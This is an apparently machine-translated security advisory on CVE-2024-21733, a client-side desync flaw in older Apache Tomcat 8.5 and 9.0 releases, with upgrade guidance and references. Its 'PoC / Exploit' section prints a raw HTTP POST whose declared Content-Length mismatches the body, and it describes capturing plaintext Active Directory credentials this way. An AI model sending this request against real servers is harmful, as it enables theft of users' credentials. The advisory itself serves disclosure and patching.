CVE-2024-21733 Apache Tomcat HTTP Request High-Risk Information Disclosure Vulnerability

Apache Tomcat 9.0.0-M11 to 9.0.43 Apache Tomcat 8.5.7 to 8.5.63 CVE-2024-21733 Apache Tomcat information disclosure critical vulnerability risk

descriptive

Apache Tomcat® software is an open source implementation of Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations, and Jakarta Authentication Specification. Authentication specification.

Apache Tomcat from 8.5.7 to 8.5.63 and from 9.0.0-M11 to 9.0.43 is vulnerable to client-side desynchronization (CSD) attacks.

affect (usually adversely)

A vulnerability related to client-side de-synchronization (CSD) occurs when a web server is unable to accurately handle the content length of a POST request. Using this issue, an attacker can manipulate the victim's browser to cause a misaligned disconnection from the website. This manipulation can lead to unauthorized extraction of sensitive data from server and client connections.

The severity of the impact varies depending on the application using Tomcat as the back-end web server, potentially exposing confidential information such as plaintext credentials. For example, our team found an instance in a version of ManageEngine's ADSelfService Plus portal prior to version 6304 where it was possible to surreptitiously obtain plaintext Active Directory credentials from client connections, as shown below.

PoC / Exploit

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119″, "Not?A_Brand";v="24″
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X

CVE-2024-21733 Apache Tomcat HTTP Request High-Risk Information Disclosure Vulnerability

prescription

Users of affected versions should take one of the following mitigation measures:
Upgrading to Apache Tomcat 9.0.44 or later
Upgrading to Apache Tomcat 8.5.64 or later
Source: xer0dayz of Sn1perSecurity LLC responsibly reported this vulnerability to the Tomcat security team.

History: 2024-01-19 Original Bulletin

Full Security Bulletin: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz

bibliography

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733

https://tomcat.apache.org/security-9.html

https://tomcat.apache.org/security-8.html

https://portswigger.net/research/browser-powered-desync-attacks

https://hackerone.com/reports/2327341

Original article by Chief Security Officer, if reproduced, please credit https://cncso.com/en/cve-2024-21733-apache-tomcat-http-request-smuggling-html

Like (1)
Previous August 10th, 2024 at 8:45 am
Next August 14th, 2024 at 8:07 am